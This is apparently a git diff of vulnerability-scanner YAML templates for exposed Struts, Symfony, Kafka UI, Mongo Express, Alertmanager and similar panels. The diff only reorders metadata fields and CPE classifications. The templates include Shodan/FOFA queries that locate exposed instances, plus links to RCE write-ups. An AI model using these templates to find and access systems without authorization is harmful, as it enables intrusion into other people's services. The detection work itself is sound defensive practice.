-# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml
index e6bfaef00f..e19b8ffc07 100644
--- a/http/misconfiguration/struts-ognl-console.yaml
+++ b/http/misconfiguration/struts-ognl-console.yaml
@@ -9,16 +9,16 @@ info:
remediation: Restrict access to the struts console on the production server
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java
+ classification:
+ cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Struts Problem Report"
- product: struts
vendor: apache
+ product: struts
+ shodan-query: html:"Struts Problem Report"
tags: apache,struts,ognl,panel,misconfig
- classification:
- cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml
index 9f72409569..f06ea9f7e6 100644
--- a/http/misconfiguration/symfony-debug.yaml
+++ b/http/misconfiguration/symfony-debug.yaml
@@ -7,16 +7,16 @@ info:
description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code.
reference:
- https://github.com/synacktiv/eos
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- shodan-query: http.html:"symfony Profiler"
- product: symfony
vendor: sensiolabs
+ product: symfony
+ shodan-query: http.html:"symfony Profiler"
tags: symfony,debug,misconfig
- classification:
- cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,6 +26,7 @@ http:
- "{{BaseURL}}/app_dev.php"
stop-at-first-match: true
+
matchers-condition: or
matchers:
- type: word
@@ -42,4 +43,5 @@ http:
- 'debug mode is enabled.'
- 'id="sfWebDebugSymfony"'
condition: or
-# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml
index 4a6afb0e0d..f73df306bc 100644
--- a/http/misconfiguration/symfony-fragment.yaml
+++ b/http/misconfiguration/symfony-fragment.yaml
@@ -11,16 +11,16 @@ info:
- https://medium.com/@m4cddr/how-i-got-rce-in-10-websites-26dd87441f22
- https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5
- https://github.com/ambionics/symfony-exploits
+ classification:
+ cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"symfony Profiler"
- product: symfony
vendor: sensiolabs
+ product: symfony
+ shodan-query: http.html:"symfony Profiler"
tags: config,exposure,symfony,misconfig
- classification:
- cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
- "(\"8b2f83102bc96e5068d36df80301a64d\" == md5(body)) || (\"4df206fbc337c398c3b669172934c8cb\" == md5(body))"
condition: and
-# digest: 490a0046304402202aae05b954b4e09d833cb11b5a201d4e5ecd6580bb6d79385fc3affcd8fae7fd022046c21c2cf4d84f67373859c47a19d36990e10c35abf35b91232125584d1591cd:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402202aae05b954b4e09d833cb11b5a201d4e5ecd6580bb6d79385fc3affcd8fae7fd022046c21c2cf4d84f67373859c47a19d36990e10c35abf35b91232125584d1591cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml
index 1d9780530b..2697e1adfa 100644
--- a/http/misconfiguration/syncthing-dashboard.yaml
+++ b/http/misconfiguration/syncthing-dashboard.yaml
@@ -7,16 +7,16 @@ info:
description: Syncthing Dashboard is exposed.
reference:
- https://syncthing.net/
+ classification:
+ cpe: cpe:2.3:a:syncthing:syncthing:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:'ng-app="syncthing"'
- product: syncthing
vendor: syncthing
+ product: syncthing
+ shodan-query: http.html:'ng-app="syncthing"'
tags: misconfig,syncthing,exposure
- classification:
- cpe: cpe:2.3:a:syncthing:syncthing:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml
index f7db62d699..4ccdafa69e 100644
--- a/http/misconfiguration/tasmota-config-webui.yaml
+++ b/http/misconfiguration/tasmota-config-webui.yaml
@@ -7,16 +7,16 @@ info:
description: Tasmota configuration is exposed.
reference:
- https://github.com/arendst/Tasmota
+ classification:
+ cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Tasmota"
- product: tasmota
vendor: tasmota_project
+ product: tasmota
+ shodan-query: title:"Tasmota"
tags: misconfig,tasmota,exposure,config
- classification:
- cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -46,4 +46,5 @@ http:
group: 1
regex:
- "Tasmota ([0-9.]+) "
-# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/teslamate-unauth-access.yaml b/http/misconfiguration/teslamate-unauth-access.yaml
index 27b2e97c98..b04ce96396 100644
--- a/http/misconfiguration/teslamate-unauth-access.yaml
+++ b/http/misconfiguration/teslamate-unauth-access.yaml
@@ -6,17 +6,17 @@ info:
severity: medium
description: |
A misconfig in Teslamate allows unauthorized access to /settings endpoint.
+ classification:
+ cpe: cpe:2.3:a:teslamate_project:teslamate:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: teslamate_project
+ product: teslamate
shodan-query: http.favicon.hash:-1478287554
fofa-query: title="teslamate"
- product: teslamate
- vendor: teslamate_project
tags: misconfig,teslamate,unauth
- classification:
- cpe: cpe:2.3:a:teslamate_project:teslamate:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
regex:
- "([0-9.]+)"
-# digest: 4b0a00483046022100a34f3dcd06fb844c5e881b8c8352b999dc24c0d0aa7b9f46bd01b87434a24f350221009cc0b519c750367431d73d8576f4815100cc5b7673c8d314a2d4fe7cf747538c:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100a34f3dcd06fb844c5e881b8c8352b999dc24c0d0aa7b9f46bd01b87434a24f350221009cc0b519c750367431d73d8576f4815100cc5b7673c8d314a2d4fe7cf747538c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml
index 61ceebd195..e2c10758c7 100644
--- a/http/misconfiguration/thinkphp-errors.yaml
+++ b/http/misconfiguration/thinkphp-errors.yaml
@@ -5,16 +5,16 @@ info:
author: j4vaovo
severity: medium
description: ThinkPHP error is leaking sensitive info.
+ classification:
+ cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: app="ThinkPHP" && title="System Error"
- product: thinkphp
vendor: thinkphp
+ product: thinkphp
+ fofa-query: app="ThinkPHP" && title="System Error"
tags: thinkphp,misconfig,exposure
- classification:
- cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -50,4 +50,5 @@ http:
- 500
- 404
condition: or
-# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml
index e793c21900..94156f14c7 100644
--- a/http/misconfiguration/tomcat-stacktraces.yaml
+++ b/http/misconfiguration/tomcat-stacktraces.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
Examine whether Tomcat stack traces are turned on by employing a designated problematic pattern.
+ classification:
+ cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Apache Tomcat"
- product: tomcat
vendor: apache
+ product: tomcat
+ shodan-query: title:"Apache Tomcat"
tags: misconfig,tech,tomcat,apache
- classification:
- cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- 'contains(body, "org.apache")'
- status_code == 400
condition: and
-# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml
index 52f9c545e0..1e6ab922d9 100644
--- a/http/misconfiguration/typo3-composer.yaml
+++ b/http/misconfiguration/typo3-composer.yaml
@@ -8,16 +8,16 @@ info:
The web application is based on Typo3 CMS. A sensitive file has been found. Access to such files must be restricted, as it may lead to disclosure of sensitive information about the web application.
reference:
- https://docs.typo3.org/c/typo3/cms-core/main/en-us/Changelog/9.0/Breaking-83302-ComposerRestrictsInstallationOfTypo3cms.html
+ classification:
+ cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "X-TYPO3-Parsetime: 0ms"
- product: typo3
vendor: typo3
+ product: typo3
+ shodan-query: "X-TYPO3-Parsetime: 0ms"
tags: typo3,cms,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100e69bb1d2924aaee4f18b3631506ae7ea6cda7c6303d4b3b2bb1d90b25eb5b26602200bbb81912d4e81d25a97ff86d41ef64e1ab72943199a0e30e32fbe754b63d485:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e69bb1d2924aaee4f18b3631506ae7ea6cda7c6303d4b3b2bb1d90b25eb5b26602200bbb81912d4e81d25a97ff86d41ef64e1ab72943199a0e30e32fbe754b63d485:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml
index 95cf35189b..a72ffc8777 100644
--- a/http/misconfiguration/typo3-debug-mode.yaml
+++ b/http/misconfiguration/typo3-debug-mode.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: low
description: TYPO3 Debug Mode is enabled.
+ classification:
+ cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"TYPO3 Exception"
- product: typo3
vendor: typo3
+ product: typo3
+ shodan-query: http.title:"TYPO3 Exception"
tags: typo3,debug,misconfig
- classification:
- cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 500
-# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml
index fe895220fa..6a2b6a40b0 100644
--- a/http/misconfiguration/unauth-apache-kafka-ui.yaml
+++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://www.acunetix.com/vulnerabilities/web/apache-kafka-unauthorized-access-vulnerability
- https://github.com/provectus/kafka-ui
+ classification:
+ cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.title:"UI for Apache Kafka"
- product: kafka
vendor: apache
+ product: kafka
+ shodan-query: http.title:"UI for Apache Kafka"
tags: misconfig,apache,kafka,unauth,exposure
- classification:
- cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 490a0046304402206d35f02707c9544a53b20bc75ffe681278c4116d63151a40944ed0bdb8d6f92b0220316ea327980abf75df261bd4a3e23df0e70300cba1fb2b70499c20308aacf543:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206d35f02707c9544a53b20bc75ffe681278c4116d63151a40944ed0bdb8d6f92b0220316ea327980abf75df261bd4a3e23df0e70300cba1fb2b70499c20308aacf543:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauth-celery-flower.yaml b/http/misconfiguration/unauth-celery-flower.yaml
index c7ea9ebd3a..acc7542112 100644
--- a/http/misconfiguration/unauth-celery-flower.yaml
+++ b/http/misconfiguration/unauth-celery-flower.yaml
@@ -6,15 +6,15 @@ info:
severity: high
description: |
Celery Flower was able to be accessed with no authentication requirements in place.
- metadata:
- max-request: 1
- shodan-query: http.favicon.hash:-374133142
- product: flower
- vendor: flower_project
- tags: celery,flower,unauth,misconfig
-
classification:
cpe: cpe:2.3:a:flower_project:flower:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: flower_project
+ product: flower
+ shodan-query: http.favicon.hash:-374133142
+ tags: celery,flower,unauth,misconfig
+
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauth-etherpad.yaml b/http/misconfiguration/unauth-etherpad.yaml
index de89986046..e452726f60 100644
--- a/http/misconfiguration/unauth-etherpad.yaml
+++ b/http/misconfiguration/unauth-etherpad.yaml
@@ -6,16 +6,16 @@ info:
severity: low
description: |
Finds Etherpad instances that allow adding new notes without authentication.
+ classification:
+ cpe: cpe:2.3:a:etherpad:etherpad:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"index.createOpenPad"
- product: etherpad
vendor: etherpad
+ product: etherpad
+ shodan-query: http.html:"index.createOpenPad"
tags: etherpad,misconfig,unauth
- classification:
- cpe: cpe:2.3:a:etherpad:etherpad:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 490a00463044022030cf89dd6dab15de5f6f97d89f3339351f94550f2ce4d86fc477a526e3825cc502204513585aa41b3fd6b4103597748ffbdd14eb2b42157551e0647d6c49b0861d2f:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022030cf89dd6dab15de5f6f97d89f3339351f94550f2ce4d86fc477a526e3825cc502204513585aa41b3fd6b4103597748ffbdd14eb2b42157551e0647d6c49b0861d2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml
index 4d8eefef4f..3897efce93 100644
--- a/http/misconfiguration/unauth-ldap-account-manager.yaml
+++ b/http/misconfiguration/unauth-ldap-account-manager.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: medium
description: LDAP Account Manager is exposed to external users.
+ classification:
+ cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"LDAP Account Manager"
- product: ldap_account_manager
vendor: ldap-account-manager
+ product: ldap_account_manager
+ shodan-query: http.title:"LDAP Account Manager"
tags: ldap,misconfig,unauth
- classification:
- cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml
index 2b977f0b60..e2c2f5c457 100644
--- a/http/misconfiguration/unauth-mercurial.yaml
+++ b/http/misconfiguration/unauth-mercurial.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: high
description: Mercurial repositories index is disclosed.
+ classification:
+ cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Mercurial repositories index"
- product: mercurial
vendor: mercurial
+ product: mercurial
+ shodan-query: html:"Mercurial repositories index"
tags: misconfig,unauth,mercurial
- classification:
- cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml
index 5b08cfa491..de5de9d51c 100644
--- a/http/misconfiguration/unauthenticated-alert-manager.yaml
+++ b/http/misconfiguration/unauthenticated-alert-manager.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDK
severity: high
description: Alert Manager was able to be accessed with no authentication requirements in place.
- metadata:
- max-request: 1
- shodan-query: http.title:"Alertmanager"
- product: alertmanager
- vendor: prometheus
- tags: unauth,alertmanager,misconfig
-
classification:
cpe: cpe:2.3:a:prometheus:alertmanager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: prometheus
+ product: alertmanager
+ shodan-query: http.title:"Alertmanager"
+ tags: unauth,alertmanager,misconfig
+
http:
- method: GET
path:
@@ -29,4 +29,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100dab26c880087c30cdab09df15c9162594c0236086943481a0651b06114fa4d3e022100c434ec5e6f764b02bf0e37e4ebb1e9d78ce89706c9ace105a4dae85a21e8b125:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100dab26c880087c30cdab09df15c9162594c0236086943481a0651b06114fa4d3e022100c434ec5e6f764b02bf0e37e4ebb1e9d78ce89706c9ace105a4dae85a21e8b125:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml
index 4e356dd670..6de07c9890 100644
--- a/http/misconfiguration/unauthenticated-mongo-express.yaml
+++ b/http/misconfiguration/unauthenticated-mongo-express.yaml
@@ -7,16 +7,16 @@ info:
description: Mongo Express was able to be access with no authentication requirements in place.
reference:
- https://www.exploit-db.com/ghdb/5684
+ classification:
+ cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
- shodan-query: title:"Home - Mongo Express"
- product: mongo-express
vendor: mongo-express_project
+ product: mongo-express
+ shodan-query: title:"Home - Mongo Express"
tags: mongo,unauth,edb,misconfig
- classification:
- cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100e283c5bbedab8b07d13294327dc2704640614f9b265ce975f37ee69ef16692fb022100f21bb9bb35c1cbafb9bbce1f5e34c779a9b7baaf19f36d7747188bf427235079:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e283c5bbedab8b07d13294327dc2704640614f9b265ce975f37ee69ef16692fb022100f21bb9bb35c1cbafb9bbce1f5e34c779a9b7baaf19f36d7747188bf427235079:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml
index 7a6ca2b072..48af349c41 100644
--- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml
+++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml
@@ -5,17 +5,17 @@ info:
author: ritikchaddha
severity: high
description: H3C server was able to be accessed with no authentication requirements in place.
+ classification:
+ cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: h3c
+ product: secpath_f5060
shodan-query: http.html:"H3C-SecPath-运维审计系统"
fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
- product: secpath_f5060
- vendor: h3c
tags: h3c,default-login,unauth,misconfig
- classification:
- cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/untangle-admin-setup.yaml b/http/misconfiguration/untangle-admin-setup.yaml
index 9ffc666929..463ecf735f 100644
--- a/http/misconfiguration/untangle-admin-setup.yaml
+++ b/http/misconfiguration/untangle-admin-setup.yaml
@@ -5,17 +5,17 @@ info:
author: ritikchaddha
severity: medium
description: Untangle Exposed Admin Signup is exposed publicly.
+ classification:
+ cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: untangle
+ product: ng_firewall
shodan-query: title:"Setup Wizard" html:"untangle"
fofa-query: title="Setup Wizard" && "untangle"
- product: ng_firewall
- vendor: untangle
tags: misconfig,untangle,admin,setup
- classification:
- cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/4D-detect.yaml b/http/technologies/4D-detect.yaml
index 1c1b41754a..c9dbd7b168 100644
--- a/http/technologies/4D-detect.yaml
+++ b/http/technologies/4D-detect.yaml
@@ -9,16 +9,16 @@ info:
- https://us.4d.com/
- https://doc.4d.com/4Dv18/4D/18.4/URLs-and-Form-Actions.300-5232844.en.html
- https://doc.4d.com/4Dv18/4D/18.4/Information-about-the-Web-Site.300-5232828.en.html
+ classification:
+ cpe: cpe:2.3:a:4d:4d:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"4DACTION/"
- product: 4d
vendor: 4d
+ product: 4d
+ shodan-query: http.html:"4DACTION/"
tags: 4D,detect,tech
- classification:
- cpe: cpe:2.3:a:4d:4d:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,6 +26,7 @@ http:
host-redirects: true
max-redirects: 2
+
matchers-condition: and
matchers:
- type: word
@@ -48,4 +49,5 @@ http:
group: 1
regex:
- 'Server:\s+4D(?:_V[0-9]+)?/([0-9.]+)'
-# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/activecollab-detect.yaml b/http/technologies/activecollab-detect.yaml
index 40a67a5a6a..eb1a3e34dc 100644
--- a/http/technologies/activecollab-detect.yaml
+++ b/http/technologies/activecollab-detect.yaml
@@ -4,15 +4,15 @@ info:
name: activecollab detect
author: ffffffff0x
severity: info
- metadata:
- max-request: 1
- fofa-query: app="ActiveCollab"
- product: activecollab
- vendor: activecollab
- tags: acsoft,tech,activecollab
-
classification:
cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: activecollab
+ product: activecollab
+ fofa-query: app="ActiveCollab"
+ tags: acsoft,tech,activecollab
+
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
